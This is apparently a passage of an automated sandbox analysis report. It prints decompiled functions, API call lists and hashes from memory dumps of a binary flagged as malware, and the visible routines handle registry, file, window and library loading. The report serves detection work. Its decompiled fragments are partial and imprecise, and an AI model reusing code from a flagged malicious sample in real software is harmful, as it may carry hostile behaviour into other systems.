Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 02170929fc818fbed94684f01c530bfaabb30566d6e962127c407c103c9f6bc4
Instruction ID: 003629ead7c1dde4a3df59a88d33c100c9cba26094b7a58fe8a243c177e5491d
Opcode Fuzzy Hash: 02170929fc818fbed94684f01c530bfaabb30566d6e962127c407c103c9f6bc4
Instruction Fuzzy Hash: 65018471904104EFE7159FA5DE89ABFB6BCEF44358F10403EF105A61D0DBB84E449B69

Uniqueness

Uniqueness Score: -1.00%

Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E1000289C(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t31;
				void* _t32;
				int _t36;
				void* _t40;
				void* _t49;
				void* _t54;
				void* _t58;
				signed int _t65;
				void* _t70;
				void* _t79;
				intOrPtr _t81;
				signed int _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				void* _t92;
				void* _t94;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				intOrPtr _t106;
				intOrPtr _t107;

				if( *0x10004050 != 0 && E1000281E(_a4) == 0) {
					 *0x10004054 = _t106;
					if( *0x1000404c != 0) {
						_t106 =  *0x1000404c;
					} else {
						E10002DE0(E10002818(), __ecx);
						 *0x1000404c = _t106;
					}
				}
				_t31 = E1000285A(_a4);
				_t107 = _t106 + 4;
				if(_t31 <= 0) {
					L9:
					_t32 = E1000284E();
					_t81 = _a4;
					_t90 =  *0x10004058;
					 *((intOrPtr*)(_t32 + _t81)) = _t90;
					 *0x10004058 = _t81;
					E10002848();
					_t36 = EnumWindows(??, ??); // executed
					 *0x10004034 = _t36;
					 *0x10004038 = _t90;
					if( *0x10004050 != 0 && E1000281E( *0x10004058) == 0) {
						 *0x1000404c = _t107;
						_t107 =  *0x10004054;
					}
					_t91 =  *0x10004058;
					_a4 = _t91;
					 *0x10004058 =  *((intOrPtr*)(E1000284E() + _t91));
					_t40 = E1000282C(_t91);
					_pop(_t92);
					if(_t40 != 0) {
						_t49 = E1000285A(_t92);
						if(_t49 > 0) {
							_push(_t49);
							_push(E10002865() + _a4 + _v8);
							_push(E1000286F());
							if( *0x10004050 <= 0 || E1000281E(_a4) != 0) {
								_pop(_t101);
								_pop(_t54);
								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t102);
								_pop(_t58);
								 *0x1000404c =  *0x1000404c +  *(_t102 + _t58) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x10004058 == 0) {
						 *0x1000404c = 0;
					}
					_t94 = _a4 + E10002865();
					 *(E10002873() + _t94) =  *0x10004034;
					 *((intOrPtr*)(E10002877() + _t94)) =  *0x10004038;
					E10002887(_a4);
					if(E1000283A() != 0) {
						 *0x10004068 = GetLastError();
					}
					return _a4;
				}
				_push(E10002865() + _a4);
				_t65 = E1000286B();
				_v8 = _t65;
				_t88 = _t31;
				_push(_t77 + _t65 * _t88);
				_t79 = E10002877();
				_t100 = E10002873();
				_t103 = E1000286F();
				_t70 = _t88;
				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
					_push( *((intOrPtr*)(_t79 + _t70)));
				}
				_push( *((intOrPtr*)(_t100 + _t70)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x100028ac
0x100028bd
0x100028ca
0x100028de
0x100028cc
0x100028d1
0x100028d6
0x100028d6
0x100028ca
0x100028e7
0x100028ec
0x100028f2
0x10002936
0x10002936
0x1000293b
0x10002940
0x10002946
0x10002948
0x1000294e
0x1000295b
0x1000295d
0x10002962
0x1000296f
0x10002982
0x10002988
0x1000298e
0x1000298f
0x10002995
0x100029a1
0x100029a7
0x100029af
0x100029b0
0x100029b3
0x100029be
0x100029c0
0x100029cc
0x100029d2
0x100029da
0x10002a06
0x10002a07
0x10002a0d
0x10002a0d
0x10002a14
0x100029ea
0x100029ea
0x100029eb
0x100029f9
0x10002a02
0x10002a02
0x100029da
0x100029be
0x10002a1d
0x10002a1f
0x10002a1f
0x10002a31
0x10002a3e
0x10002a4c
0x10002a52
0x10002a60
0x10002a68
0x10002a68
0x10002a76
0x10002a76
0x100028fd
0x100028fe
0x10002903
0x10002907
0x1000290c
0x10002920
0x10002921
0x10002922
0x10002924
0x10002929
0x1000292b
0x1000292b
0x1000292e
0x10002934
0x00000000

APIs

EnumWindows.USER32(00000000), ref: 1000295B
GetLastError.KERNEL32 ref: 10002A62

Memory Dump Source

Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd

Similarity

API ID: EnumErrorLastWindows
String ID:
API String ID: 14984897-0
Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E004061C9(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}

0x0040247e
0x0040247e
0x00402483
0x0040248a
0x0040248c
0x00402493
0x00402496
0x00402885
0x0040249c
0x0040249f
0x004024ba
0x004024ea
0x004024ea
0x004024ed
0x004024bc
0x004024c0
0x004024d9
0x004024e0
0x004024e3
0x004024c2
0x004024c5
0x004024d0
0x00402549
0x00000000
0x00000000
0x00000000
0x004024c5
0x004024c0
0x00402550
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbA35F.tmp,00000000,00000011,00000002), ref: 00402551

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: eed506b0cef53421108cb298528dda3e536a838de4d8cdecc9fe09217e6dde99
Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
Opcode Fuzzy Hash: eed506b0cef53421108cb298528dda3e536a838de4d8cdecc9fe09217e6dde99
Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433ecc =  *0x433ecc + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433ecc, 0x7530,  *0x433eb4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402388(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t7 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402388
0x00402388
0x0040238b
0x0040238e
0x004023ca
0x004023cf
0x00000000
0x00402390
0x00402392
0x00402397
0x0040239b
0x00402885
0x00402885
0x004023a1
0x004023b1
0x004023b3
0x004023d1
0x004023d3
0x00000000
0x004023d9
0x004023d3
0x0040239b
0x00402ac2
0x00402ace

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
RegCloseKey.ADVAPI32(00000000), ref: 004023B3

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: 86383d69255a0886f095d774a645512c19a2905d4149a767ae50d9de73aafd9d
Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
Opcode Fuzzy Hash: 86383d69255a0886f095d774a645512c19a2905d4149a767ae50d9de73aafd9d
Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D

Uniqueness

Uniqueness Score: -1.00%

Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401E61
EnableWindow.USER32(00000000,00000000), ref: 00401E6C

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
Opcode Fuzzy Hash: ab0b3ff11964813a20d8fadc6ef3132646fc38e43e955189219e3d879e680ae5
Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040665C(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065EC(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406664
0x00406667
0x0040666e
0x00406676
0x00406682
0x00000000
0x00406689
0x00406679
0x00406680
0x00000000
0x00406691
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
GetProcAddress.KERNEL32(00000000,?), ref: 00406689

Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D74(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d78
0x00405d85
0x00405d9a
0x00405da0

APIs

GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405D4F Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D4F(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d54
0x00405d5a
0x00405d5f
0x00405d68
0x00405d68
0x00405d71

APIs

GetFileAttributesW.KERNELBASE(?,?,00405954,?,?,00000000,00405B2A,?,?,?,?), ref: 00405D54
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D68

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction ID: 17c45ac7ebe851d6f29742f799baae9df596671d30cdc88244d2177400b79203
Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
Instruction Fuzzy Hash: C6D01276505420AFC2512738EF0C89FBF95DB54371B068B35FAE9A22F0CB304C578A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405832(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405838
0x00405840
0x00000000
0x00405846
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
